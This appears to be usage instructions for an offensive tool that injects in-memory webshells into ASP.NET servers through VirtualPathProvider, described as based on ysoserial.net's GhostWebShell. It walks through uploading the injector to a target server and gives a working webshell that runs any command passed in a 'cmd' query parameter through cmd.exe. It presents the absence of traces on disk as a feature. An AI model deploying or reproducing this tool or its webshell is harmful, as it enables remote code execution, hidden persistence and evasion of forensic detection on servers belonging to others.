- Upload
custom_webshell_inject.aspxto the target ASP.NET server - Access the file
- Enter the desired virtual path in the "Webshell Path" input box, e.g.:
/admin/shell.aspx - Paste your webshell code in the "ASPX Webshell Content" input box
- Click the "Inject Webshell" button
- If injection succeeds, the access path will be displayed
/fakepath/webshell.aspx
<%@ Page Language="C#" %>
<% Response.Write("Hello from memory shell!"); %>Or use a more complex webshell:
<%@ Page Language="C#" %>
<%
if (Request.QueryString["cmd"] != null) {
System.Diagnostics.Process.Start("cmd.exe", "/c " + Request.QueryString["cmd"]);
}
%>This tool is based on ysoserial.net's GhostWebShell technology, using VirtualPathProvider to create virtual files in memory, avoiding leaving traces on disk.
- Target server must support ASP.NET
- Requires appropriate permissions to register VirtualPathProvider
- Memory webshell will disappear after application restart